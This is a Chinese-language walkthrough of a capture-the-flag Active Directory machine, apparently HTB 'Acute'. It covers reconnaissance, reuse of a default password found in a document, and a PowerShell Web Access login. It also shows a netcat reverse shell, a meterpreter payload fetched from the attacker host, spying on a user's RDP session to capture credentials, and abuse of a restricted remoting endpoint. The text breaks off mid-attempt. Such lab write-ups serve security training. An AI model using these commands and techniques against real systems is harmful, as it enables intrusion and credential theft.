Tracks-AD-Acute

AD
50k words

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
└─$ sudo nmap -sS 10.10.11.145 -p- --min-rate=3000
Nmap scan report for 10.10.11.145
Host is up (1.0s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
443/tcp open https


└─$ sudo nmap -sS 10.10.11.145 -p443 -sCV --min-rate=3000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-05 22:11 EST
Nmap scan report for 10.10.11.145
Host is up (0.58s latency).

PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
|_ssl-date: 2025-03-06T02:54:15+00:00; -17m47s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

User

to edavies

只有一个443的web

从ssl的下发可以看到他dns主体走的atsserver.acute.local,加到hosts里

访问web,首页如下

alt text

这里只有about点了有反应,其他路径都没用。

在about页面的右上角多了个doc的下载路径

alt text

同时,往下滑能看到有一部分用户名,收集到字典。

alt text

下载doc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ wget --no-check-certificate 'https://atsserver.acute.local/New_Starter_CheckList_v7.docx'

https://atsserver.acute.local/New_Starter_CheckList_v7.docx
Resolving atsserver.acute.local (atsserver.acute.local)... 10.10.11.145
Connecting to atsserver.acute.local (atsserver.acute.local)|10.10.11.145|:443... connected.
WARNING: The certificate of ‘atsserver.acute.local’ is not trusted.
WARNING: The certificate of ‘atsserver.acute.local’ doesn't have a known issuer.
HTTP request sent, awaiting response... 200 OK
Length: 34566 (34K) [application/vnd.openxmlformats-officedocument.wordprocessingml.document]
Saving to: ‘New_Starter_CheckList_v7.docx’

New_Starter_CheckList_v7.docx 100%[=========================================================================================================>] 33.76K --.-KB/s in 0.03s

‘New_Starter_CheckList_v7.docx’ saved [34566/34566]

先看信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
└─$ exiftool New_Starter_CheckList_v7.docx
ExifTool Version Number : 13.00
File Name : New_Starter_CheckList_v7.docx
Directory : .
File Size : 35 kB
File Permissions : -rw-rw-r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x079b7eb2
Zip Compressed Size : 428
Zip Uncompressed Size : 2527
Zip File Name : [Content_Types].xml
Creator : FCastle
Description : Created on Acute-PC01
Last Modified By : Daniel
Revision Number : 8
Last Printed : 2021:01:04 15:54:00Z
Create Date : 2021:12:08 14:21:00Z
Modify Date : 2021:12:22 00:39:00Z
Template : Normal.dotm
Total Edit Time : 2.6 hours
Pages : 3
Words : 886
Characters : 5055
Application : Microsoft Office Word
Doc Security : None
Lines : 42
Paragraphs : 11
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company : University of Marvel
Links Up To Date : No
Characters With Spaces : 5930
Shared Doc : No
Hyperlinks Changed : No
App Version : 16.0000

得到如下信息,创建者FCastle,主机名Acute-PC01

1
2
Creator                         : FCastle
Description : Created on Acute-PC01

一份培训工作相关的文档,在文档中包含一部分web路径,以及相关敏感信息等

这里超链接到一个web路径

alt text

这里表示,只有lois有权限更改用户权限,并只有lois可以成为site admin(站点管理员)

Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin.

alt text

然后其中包含了一个初始密码Password1!

alt text

其中https://atsserver.acute.local/Acute_Staff_Access访问后可以得到一个pswa登录页面

https://www.msb365.blog/?p=353

alt text

这里用之前about页面收集到的用户名做个字典

1
2
3
4
5
6
7
8
9
└─$ cat userlist                  
Aileen Wallace
Charlotte Hall
Evan Davies
Ieuan Monks
Joshua Morgan
Lois Hopkins

└─$ ~/tools/wordlist/username-anarchy/username-anarchy -i userlist -C false >> u_wl

然后依照New_Starter_CheckList_v7.docx文档创建者FCastle命名规则,进行筛选出类似的命名格式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ grep -E '[A-Z]{2}\w+' u_wl|tr 'A-Z' 'a-z'
awallace
chall
edavies
imonks
jmorgan
lhopkins

└─$ grep -E '[A-Z]{2}\w+' u_wl
AWallace
CHall
EDavies
IMonks
JMorgan
LHopkins

因为不知道具体的能登陆的用户有没有限制用户名大小写,所以大小写都要尝试一下。

alt text

主机名我们有两个,疑似是域控dns的atsserver以及创建doc文档的主机Acute-PC01

所以都要尝试.

这里用EDavies登陆时弹了个报错

alt text

然后用CHall时候也有个报错

alt text

神奇的是再一次用EDavies登录Acute-PC01又成功了,可能是机器的服务还没完全拉起来,在之后重启之后也出现了同样的情况。

所以最终登录用的

1
2
3
4
Username: edavies
Password: Password1!

ComputerName: Acute-PC01

alt text

这里进来之后弹个shell先,然后发现开了wd,我不想bypass,所以看下有没有路径被加白了.

Get-MpPreference没权限

1
2
3
4
5
6
7
8
9
PS C:\Users\edavies\Documents> 

Get-MpPreference | select ExclusionPath

Cannot connect to CIM server. Access denied

+ CategoryInfo : ResourceUnavailable: (MSFT_MpPreference:String) [Get-MpPreference], CimJobException

+ FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-MpPreference

看注册表则是有俩路径被加了

1
2
3
4
5
6
7
PS C:\Users\edavies\Documents> reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths

C:\Utils REG_DWORD 0x0

C:\Windows\System32 REG_DWORD 0x0

传个nc,因为他web时不时的就断开了,弹个shell方便些。

1
curl 10.10.16.4/nc64.exe -o C:\Utils\nc64.exe

创建shell

1
2
3
4
PS C:\utils> start-job -scriptblock {C:\utils\nc64.exe 10.10.16.4 10086 -e powershell.exe}
Id Name PSJobTypeName State HasMoreData Location Command
-- ---- ------------- ----- ----------- -------- -------
1 Job1 BackgroundJob Running True localhost C:\utils\nc64.exe 10.1...

接到

1
2
3
4
5
6
7
8
9
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.145] 49785
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\edavies\Documents>

to imonks

翻了下当前edavies在这台机器上没有什么有价值的文件

想看下域内信息,起了个ligolo-ng做代理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
.\agent.exe -connect 10.10.16.4:11601 -retry -ignore-cert



└─$ ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 5F755516F0FA3801926C7466A89AF488302C3C7CF2419FF3F63D03A208F94D46
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.2-alpha

ligolo-ng » INFO[0118] Agent joined. name="ACUTE\\edavies@Acute-PC01" remote="10.10.11.145:49856"
ligolo-ng » session
? Specify a session : 1 - ACUTE\edavies@Acute-PC01 - 10.10.11.145:49856 - 1ed0b1ae-fa1e-475d-8276-1bacd1b38e38
[Agent : ACUTE\edavies@Acute-PC01] »

ldap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
└─$ ldapsearch -x -H ldap://172.16.22.1  -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=acute,DC=local
ldapServiceName: acute.local:atsserver$@ACUTE.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=acute,DC=local
serverName: CN=ATSSERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Con
figuration,DC=acute,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=acute,DC=local
namingContexts: DC=acute,DC=local
namingContexts: CN=Configuration,DC=acute,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=acute,DC=local
namingContexts: DC=DomainDnsZones,DC=acute,DC=local
namingContexts: DC=ForestDnsZones,DC=acute,DC=local
isSynchronized: TRUE
highestCommittedUSN: 153093
dsServiceName: CN=NTDS Settings,CN=ATSSERVER,CN=Servers,CN=Default-First-Site-
Name,CN=Sites,CN=Configuration,DC=acute,DC=local
dnsHostName: ATSSERVER.acute.local
defaultNamingContext: DC=acute,DC=local
currentTime: 20250310082450.0Z
configurationNamingContext: CN=Configuration,DC=acute,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

得到域控名是啥ATSSERVER.acute.local

但是遛狗会提示连不上ldap!擦

所以继续会Acute-PC01跑一下winpeas

有个rdp连接在

1
2
3
͹ RDP Sessions
SessID pSessionName pUserName pDomainNameState SourceIP
1 Console edavies ACUTE Active

qwinsta看下用户

1
2
3
4
5
C:\Windows\system32>qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
services 0 Disc
>console edavies 1 Active
31c5ce94259d4... 65536 Listen

正常情况下靶机是很少出现有用户开着rdp连着的,所以这里得去下rdp连上后做了什么操作

这里用msf做屏幕监视,cs用不习惯

1
2
3
4
5
6
7
8
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=10087 -f exe -o t.exe
Warning: KRB5CCNAME environment variable not supported - unsetting
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: t.exe

生成一个载荷,把他丢到C:\utils

1
2
3
PS C:\Utils> curl 10.10.16.4/t.exe -o t.exe
curl 10.10.16.4/t.exe -o t.exe
PS C:\Utils>

msf搞一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Payload options (generic/shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target

加一下配置然后起监听

1
2
3
4
5
6
7
8
9
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 10.10.16.4
LHOST => 10.10.16.4
msf6 exploit(multi/handler) > set LPORT 10087
LPORT => 10087
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.4:10087

运行马子

1
PS C:\Utils> .\t.exe

然后拿到了一个shell

1
2
3
4
5
6
7
msf6 exploit(multi/handler) > sessions
Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
58 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.4:10087 -> 10.10.11.145:49793 (172.16.22.2)

为了shell稳点选个进程迁移下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
52 656 svchost.exe
72 4 Registry
160 4244 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
388 4 smss.exe
444 656 svchost.exe
460 656 SecurityHealthService.exe
496 484 csrss.exe
564 484 wininit.exe
572 556 csrss.exe
576 656 svchost.exe
632 556 winlogon.exe
656 564 services.exe
664 564 lsass.exe
684 656 svchost.exe
776 656 svchost.exe
784 656 svchost.exe
792 632 fontdrvhost.exe
800 564 fontdrvhost.exe
856 656 svchost.exe
884 656 svchost.exe
964 632 dwm.exe
1032 656 svchost.exe
1124 656 svchost.exe
1372 4056 conhost.exe x64 1 ACUTE\edavies C:\Windows\System32\conhost.exe
1416 656 svchost.exe
1448 656 svchost.exe
1516 656 svchost.exe
1744 656 svchost.exe
1860 4 Memory Compression
1960 656 svchost.exe
1968 656 svchost.exe
2088 656 MsMpEng.exe
2416 656 svchost.exe
2628 656 svchost.exe
2832 656 svchost.exe
3096 784 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
3120 4056 Utilman.exe x64 1 ACUTE\edavies C:\Windows\System32\Utilman.exe
3212 656 svchost.exe x64 1 ACUTE\edavies C:\Windows\System32\svchost.exe
3220 576 sihost.exe x64 1 ACUTE\edavies C:\Windows\System32\sihost.exe
3228 784 dllhost.exe x64 1 ACUTE\edavies C:\Windows\System32\dllhost.exe
3292 656 NisSrv.exe
3324 784 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
3340 576 MicrosoftEdgeUpdate.exe
3440 576 taskhostw.exe x64 1 ACUTE\edavies C:\Windows\System32\taskhostw.exe
3448 6372 powershell.exe x64 0 ACUTE\edavies C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3648 4244 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
3832 3816 explorer.exe x64 1 ACUTE\edavies C:\Windows\explorer.exe
3964 656 svchost.exe x64 1 ACUTE\edavies C:\Windows\System32\svchost.exe
4056 576 cmd.exe x64 1 ACUTE\edavies C:\Windows\System32\cmd.exe
4172 3832 OneDrive.exe x64 1 ACUTE\edavies C:\Users\edavies\AppData\Local\Microsoft\OneDrive\OneDrive.exe
4196 7020 conhost.exe
4216 3448 t.exe x64 0 ACUTE\edavies C:\Utils\t.exe
4244 3832 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4264 4244 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4296 4244 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4464 784 StartMenuExperienceHost.exe x64 1 ACUTE\edavies C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
4512 784 wsmprovhost.exe x64 0 ACUTE\edavies C:\Windows\System32\wsmprovhost.exe
4528 784 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
4632 784 SearchApp.exe x64 1 ACUTE\edavies C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
4744 784 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
4820 784 wsmprovhost.exe x64 0 ACUTE\edavies C:\Windows\System32\wsmprovhost.exe
5188 656 svchost.exe
5400 6824 powershell.exe x64 0 ACUTE\edavies C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
5436 3448 a.exe x64 0 ACUTE\edavies C:\Utils\a.exe
5648 784 ShellExperienceHost.exe x64 1 ACUTE\edavies C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
5748 656 SgrmBroker.exe
5820 656 uhssvc.exe
5880 784 MoUsoCoreWorker.exe
5964 656 svchost.exe
6048 3832 powershell.exe x64 1 ACUTE\edavies C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6216 576 taskhostw.exe x64 1 ACUTE\edavies C:\Windows\System32\taskhostw.exe
6348 6952 t.exe x64 0 ACUTE\edavies C:\Utils\t.exe
6372 5400 nc64.exe x64 0 ACUTE\edavies C:\Utils\nc64.exe
6392 5400 conhost.exe x64 0 ACUTE\edavies C:\Windows\System32\conhost.exe
6560 6048 conhost.exe x64 1 ACUTE\edavies C:\Windows\System32\conhost.exe
6632 3448 a.exe x64 0 ACUTE\edavies C:\Utils\a.exe
6824 784 wsmprovhost.exe x64 0 ACUTE\edavies C:\Windows\System32\wsmprovhost.exe
7020 576 dsregcmd.exe

看中3212了

1
2
3
4
5
6
7
meterpreter > getpid
Current pid: 5436
meterpreter > migrate 3212
[*] Migrating from 5436 to 3212...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 3212

然后就是看桌面,实时看屏幕用screenshare,其实screenshot拍照会好一些,因为这个特别容易丢shell

1
meterpreter > screenshare

弹出html能看到当前rdp用户操作

alt text

能看到这个用户想用Enter-pSSession开一个交互用imonks身份连到域控机器atsserver,然后提示没权限

然后他又尝试带着凭证去请求,这次返回了没有Measure-Object查了下,可能是他没权限导致的。

https://forums.powershell.org/t/powershell-remoting-broken/5113/9

alt text

会发现它后面加了个ConfigurationName指向dc_manage报错就变了,说明必须要用dc_manage,config又限制了他执行命令的范围

我想看下dc_manage给的啥策略,结果也没权限看,岂可休

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/get-pssessionconfiguration?view=powershell-7.5

1
2
3
4
5
6
7
8
9
10
PS C:\utils> Get-PSSessionConfiguration
Get-PSSessionConfiguration
Get-PSSessionConfiguration : Access is denied. To run this cmdlet, start Windows PowerShell with the "Run as
administrator" option.
At line:1 char:1
+ Get-PSSessionConfiguration
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-PSSessionConfiguration], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetPSSessionConfiguration
Command

不过可以注意到这个rdp用户虽然Enter-PSSession没权限,但是我们仍然可以拿着它密码尝试别的命令,比如Invoke-Command

这里用他rdp看到的用户密码执行,同样需要指定dc_manage才可以,估计是做了啥限制。

比如,如果 dc_manage 的权限被设置为仅允许特定用户,而其他配置(如 Microsoft.PowerShell)的权限被设置为拒绝普通用户,则用户必须显式指定 -ConfigurationName dc_manage。

禁止普通用户使用默认配置比如用下面这个

1
Set-PSSessionConfiguration -Name Microsoft.PowerShell -SecurityDescriptorSddl "O:NSG:BAD:P(A;;GA;;;BA)S:"

抑或是直接Register-PSSessionConfiguration注册

而要想查看有啥配置就得用Get-PSSessionConfiguration,而当前用户又没权限看。

1
2
3
4
5
6
7
8
9
PS C:\utils> Get-PSSessionConfiguration | Format-Table Name, Permission
Get-PSSessionConfiguration : Access is denied. To run this cmdlet, start Windows PowerShell with the "Run as
administrator" option.
At line:1 char:1
+ Get-PSSessionConfiguration | Format-Table Name, Permission
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-PSSessionConfiguration], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetPSSessionConfiguration
Command

那就用Invoke-Command直接执行rdp用户一开始想执行的命令,能看到这次估计是dc_manage限制了

1
2
3
4
5
6
7
8
9
10
11
PS C:\utils> $passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsplainText -Force
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsplainText -Force
PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd)
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd)
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Get-Culture }
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Get-Culture }
The term 'Get-Culture' is not recognized as the name of a cmdlet, function, script file, or operable program. Check
the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (Get-Culture:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVER

看下能指定哪些命令

1
2
3
4
5
6
7
8
9
10
11
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { get-command}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Cmdlet Get-Alias 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-ChildItem 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Command 3.0.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Write-Output 3.1.0.0 Microsoft.PowerSh... ATSSERVER

至少读、列出文件、创建文件之类的时ok的,所以看下imonks~/desktop,其中包含一个user flag和一个wm.ps1

1
2
3
4
5
6
7
8
9
10
11
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls ~/desktop}
Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls ~/desktop}


Directory: C:\Users\imonks\desktop


Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 10/03/2025 00:57 34 user.txt atsserver
-a---- 11/01/2022 18:04 602 wm.ps1 atsserver

这里能看到他是又以jmorgan用户来invoke-command执行调用Acute-PC01主机的Get-Volume命令

1
2
3
4
5
6
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { cat ~/desktop/wm.ps1}

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds

to jmorgan

这不同于当前imonks是在atsserver执行命令,这个wm.ps1脚本是在atsserver上,但是执行的调用却回Acute-PC01去了,笑了

这里打算拿他那这个密码去执行命令,然后转换时候报了ConvertTo-SecureString : Key not valid for use in specified state.

1
2
3
4
5
6
7
8
9
10
11
PS C:\Utils> $securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
PS C:\Utils> $passwd = $securepasswd | ConvertTo-SecureString
$passwd = $securepasswd | ConvertTo-SecureString
ConvertTo-SecureString : Key not valid for use in specified state.
At line:1 char:27
+ $passwd = $securepasswd | ConvertTo-SecureString
+ ~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [ConvertTo-SecureString], CryptographicException
+ FullyQualifiedErrorId : ImportSecureString_InvalidArgument_CryptographicError,Microsoft.PowerShell.Commands.Conv
ertToSecureStringCommand

找到了这篇文章

https://learn.microsoft.com/en-us/answers/questions/2102987/key-not-valid-for-use-in-specified-state

alt text

其中提到,如果安全字符串是由其他用户加密的,或者在与尝试解密它不同的计算机上加密的,就会这样。

所以还是需要用imonks在对面atsserver做这个操作才可以

然后又报错了,因为dc_manage限制的存在,没命令执行权限直接。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51';$passwd = $securepasswd | ConvertTo-SecureString;$creds = New-Object System.Management.Automation.PSCredential("acute\jmorgan", $passwd);Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds}
